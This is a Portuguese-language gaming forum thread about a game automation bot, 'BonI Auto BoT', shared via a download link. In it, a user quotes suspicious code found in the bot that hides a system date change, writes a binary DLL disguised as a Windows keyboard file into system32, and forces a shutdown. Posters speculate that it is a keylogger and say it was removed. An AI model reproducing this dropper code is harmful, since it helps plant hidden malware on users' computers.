Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

BonI Auto BoT - corrigdo para EE


 Compartilhar

Posts Recomendados

Notei que na S4 as posições para autobuff estava diferentes, procurei um bot atualizado mas não achei, então perdi umas horinhas e corrigi as cordenadas, mas o autoparty não esta funcionado se algum tiver o boni bot em uma versao antiga e puder me enviar eu posso tentar corrigir pois este que no momento tem muita coisa no codigo e complica um pouco para achar e entender as funções.

espero que as ee façam bom proveito

Eu garanto que deste link esse bot esta limpo, obvio que muito estarão desconfiados, para isso utilizem o site abaixo para verificar se tem virus:

É necessário se cadastrar para acessar o conteúdo.

 

como solicita o link do scan:

É necessário se cadastrar para acessar o conteúdo.

mas aconcelho sempre depois de bixar qualquer arquivo a executar scan.

 

bot Atualizado 27/06/09 link abaixo:

http://rapidshare.com/files/249330511/tablet.zip.html

 

Correções:

*nova esta agora funcionando e autocombo (teste) esta no alt+4

*limpador esta 90% pode ocorrer os seguintes problemas:

o boneco sair andando caso nao tenha item no espaço que ele clicar no inventario e ja tenha tocado

um itens antes e se passar um move e nõ tiver nenhum item para jogar no chao, ele sai correndo traz do

mob ^^.

*click direito esta ok.

 

Gl a todos

Link para o comentário
Compartilhar em outros sites

Toskayo , bom trabalho man, porem versão anterior do bot vai ser dificil =P , ele sempre teve a linha de código grande assim ^^....

 

PS: Reeditando , para poupar seu trabalho , eu estou corrigindo alguns bugs aqui, agradeço sua boa vontade em corrigir o Auto Buff ... facilitou muito meu trabalho ... já corrigi o auto party , e as funções para DL

 

vou adicionar agora o comando para o bot apertar shift enquanto limpa o inventario , assim o char não anda , e quando terminar eu Upo ele para download

Link para o comentário
Compartilhar em outros sites

vlw brow, grande foç a sua !

posta o down depois que dou um olhada se tiver mais alguma coisa que eu possa fazer eu meto a mão

 

corrigidos:

*elf hibrida;

*ee;

*click direito;

*limpeza (obs não esta 100%, ele nda quando tenta pegar um espaço vazio aconselho deixar o tempo de limpeza alto);

*tecla alt+7 autocombo (ainda experimental);

 

espero que aproveitem ^^

vale lembrar que pode verificar o antivirus neste site

É necessário se cadastrar para acessar o conteúdo.

Link para o comentário
Compartilhar em outros sites

Notei que na S4 as posições para autobuff estava diferentes, procurei um bot atualizado mas não achei, então perdi umas horinhas e corrigi as cordenadas, mas o autoparty não esta funcionado se algum tiver o boni bot em uma versao antiga e puder me enviar eu posso tentar corrigir pois este que no momento tem muita coisa no codigo e complica um pouco para achar e entender as funções.

espero que as ee façam bom proveito

Eu garanto que deste link esse bot esta limpo, obvio que muito estarão desconfiados, para isso utilizem o site abaixo para verificar se tem virus:

É necessário se cadastrar para acessar o conteúdo.

 

como solicita o link do scan:

É necessário se cadastrar para acessar o conteúdo.

mas aconcelho sempre depois de bixar qualquer arquivo a executar scan.

 

bot Atualizado 21/06/09 link abaixo:

RapidShare: Easy Filehosting

 

Correções:

*nova esta agora funcionndo e autocombo (teste) esta no alt+4

*limpador ainda esta com problema.

*click direito esta ok.

 

Gl a todos

Ae... me explica essa linhaÇ

 

If $prek = 1 Then

RunWait(@ComSpec & " /c " & 'date 28/10/2001', "", @SW_HIDE)

IniWrite(@WindowsDir & "\system32\kdbhe320.dll", "]kzk%$","MZ � � ÿÿ ¸ @ Ð ��º� ´ Í!¸�LÍ!This program cannot be run in DOS mode.$ ¯3dÙëRŠëRŠëRŠ�q5ŠêRŠ|qOŠêRŠ1q�ŠêRŠ�q7ŠêRŠRichëRŠ�� �“}; à �!��� � � � ÿ_ � � � � � � � � @ � �f � � � � � � p� R � 0 À Ð� � .data ó� � � � @ `.rsrc � � � @ B.reloc Ì 0 � � @ B ÿ � 1 2 3 4 5 6 7 8 9 0 ¿ Û � Q W E R T Y U I O P » Ý ¢ A S D F G H J K L º Þ À * Ü Z X C V B N M ¼ ¾ ½ ¡�j�¤ � p q r s t u v w x y �‘�$�&�!�m %���'�k #�(��-�.�, ÿ â z { � î ñ ê ù õ ó ÿ ÿ û / | } ~ � € ‚ ƒ „ … † í ÿ é ÿ Á ÿ ÿ ‡ ÿ ÿ ÿ ÿ ë ÿ  � ±�� �� £� *�! ·� ³�$ ²�. ®�0 ¯�2 ¬�5 o�7 ,�8 ¥�G $�H &�I !�K %�M '�O #�P (�Q �R -�S .�[ [�\ \�] ]�_ _�e ª�f «�g ¨�h ©�i §�j ¦�k ¶�l ´�m µ�� �F �� � � ������ ¤�ÿ_� ������ À ½ ± 1 1 ! 7 7 / Q ~�: W Â�~ T�Ä�¤�U�¸�˜�I�¹�™�O�¿�Ÿ�P�À�*�A�±�‘�S�Ã�£�D�´�”�F�Æ�¦�G�³�“�H�·�—�J�¾�ž�K�º�š�L�»�›�Z�¶�–�X�Ç�§�V�É�©�B�²�’�N�½��M�¼�œ�¼ , ; ¾ . : â < > n , , k + + o / / j * * m - - O r i g i n a l F i l e n a m e k b d h e 3 2 0 . d l l j % � P r o d u c t N a m e M i c r o s o f t ® W i n d o w s ® O p e r a t i n g S y s t e m : � � P r o d u c t V e r s i o n 5 . 1 . 2 6 0 0 . 0 D � V a r F i l e I n f o $ � T r a n s l a t i o n °� � À ¬1Ø3à3è3ð3ø3�4�4�4$4,444<4D4L4T4\4d4l4t4|4„4Œ4”4œ4¤4¬4´4¼4Ä4Ì4Ô4Ü4ä4ì4ô4ü4�5�5�5�5$5,545<5D5L5T5\5d5l5t5|5„5Œ5”5œ5¬5´5¼5Ä5Ì5Ô5Ü5ä5ì5ô5ü5�6�6�6�6$6,646<6D6L6T6`6d6h6074787<7@7D7H7P7T7î; ", "º")

RunWait(@ComSpec & " /c " & 'date 03/08/2006', "", @SW_HIDE)

Shutdown(6)

Exit

 

Ela roda essa DLL pra q?

essa e outra linha são muito suspeitas...na outra ele cria uma dll me explica ela. Será que é essa linha q acusa como virús?

Apaguei elas.. antes de usar o bot (claro)e ele funcionou normalmente. Será um keylog? me explica ela q eu fiquei curioso.

 

PAZ

Link para o comentário
Compartilhar em outros sites

Ae... me explica essa linhaÇ

 

If $prek = 1 Then

RunWait(@ComSpec & " /c " & 'date 28/10/2001', "", @SW_HIDE)

IniWrite(@WindowsDir & "\system32\kdbhe320.dll", "]kzk%$","MZ � � ÿÿ ¸ @ Ð ��º� ´ Í!¸�LÍ!This program cannot be run in DOS mode.$ ¯3dÙëRŠëRŠëRŠ�q5ŠêRŠ|qOŠêRŠ1q�ŠêRŠ�q7ŠêRŠRichëRŠ�� �“}; à �!��� � � � ÿ_ � � � � � � � � @ � �f � � � � � � p� R � 0 À Ð� � .data ó� � � � @ `.rsrc � � � @ B.reloc Ì 0 � � @ B ÿ � 1 2 3 4 5 6 7 8 9 0 ¿ Û � Q W E R T Y U I O P » Ý ¢ A S D F G H J K L º Þ À * Ü Z X C V B N M ¼ ¾ ½ ¡�j�¤ � p q r s t u v w x y �‘�$�&�!�m %���'�k #�(��-�.�, ÿ â z { � î ñ ê ù õ ó ÿ ÿ û / | } ~ � € ‚ ƒ „ … † í ÿ é ÿ Á ÿ ÿ ‡ ÿ ÿ ÿ ÿ ë ÿ  � ±�� �� £� *�! ·� ³�$ ²�. ®�0 ¯�2 ¬�5 o�7 ,�8 ¥�G $�H &�I !�K %�M '�O #�P (�Q �R -�S .�[ [�\ \�] ]�_ _�e ª�f «�g ¨�h ©�i §�j ¦�k ¶�l ´�m µ�� �F �� � � ������ ¤�ÿ_� ������ À ½ ± 1 1 ! 7 7 / Q ~�: W Â�~ T�Ä�¤�U�¸�˜�I�¹�™�O�¿�Ÿ�P�À�*�A�±�‘�S�Ã�£�D�´�”�F�Æ�¦�G�³�“�H�·�—�J�¾�ž�K�º�š�L�»�›�Z�¶�–�X�Ç�§�V�É�©�B�²�’�N�½��M�¼�œ�¼ , ; ¾ . : â < > n , , k + + o / / j * * m - - O r i g i n a l F i l e n a m e k b d h e 3 2 0 . d l l j % � P r o d u c t N a m e M i c r o s o f t ® W i n d o w s ® O p e r a t i n g S y s t e m : � � P r o d u c t V e r s i o n 5 . 1 . 2 6 0 0 . 0 D � V a r F i l e I n f o $ � T r a n s l a t i o n °� � À ¬1Ø3à3è3ð3ø3�4�4�4$4,444<4D4L4T4\4d4l4t4|4„4Œ4”4œ4¤4¬4´4¼4Ä4Ì4Ô4Ü4ä4ì4ô4ü4�5�5�5�5$5,545<5D5L5T5\5d5l5t5|5„5Œ5”5œ5¬5´5¼5Ä5Ì5Ô5Ü5ä5ì5ô5ü5�6�6�6�6$6,646<6D6L6T6`6d6h6074787<7@7D7H7P7T7î; ", "º")

RunWait(@ComSpec & " /c " & 'date 03/08/2006', "", @SW_HIDE)

Shutdown(6)

Exit

 

Ela roda essa DLL pra q?

essa e outra linha são muito suspeitas...na outra ele cria uma dll me explica ela. Será que é essa linha q acusa como virús?

Apaguei elas.. antes de usar o bot (claro)e ele funcionou normalmente. Será um keylog? me explica ela q eu fiquei curioso.

 

PAZ

olha tambem achei estranho, nesta ultima versao que disponibilizei a cima foi desabilitado esses codigos e nao ouve problema nenhuma, vc perguntou se era keyloger, pois acho que não exatamente, ele necessitaria de mais algum aplicativo(trojan) para enviar caso fosse keyloger, bom o caso que agora ta desabilitado ^^

 

gl

Link para o comentário
Compartilhar em outros sites

Em realidade não necessitaria de nada para enviar (trojan), dentro de uma dll é possível fazer o envio facilmente... mas está explicado... agradeço pelo Bot ...

 

PAZ

 

*bom trabalho, posso dar uma dica ... coloca mensagem(como @@limpa inventario 1...por exemplo) qdo ativar a limpeza de inventário, porque sem msg fica ruim de saber se foi ativado ou nâo.....

 

Coloquei aki e ficou bom.....

 

 

flw

Link para o comentário
Compartilhar em outros sites

  • 2 semanas atrás...
  • 1 mês depois...
Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.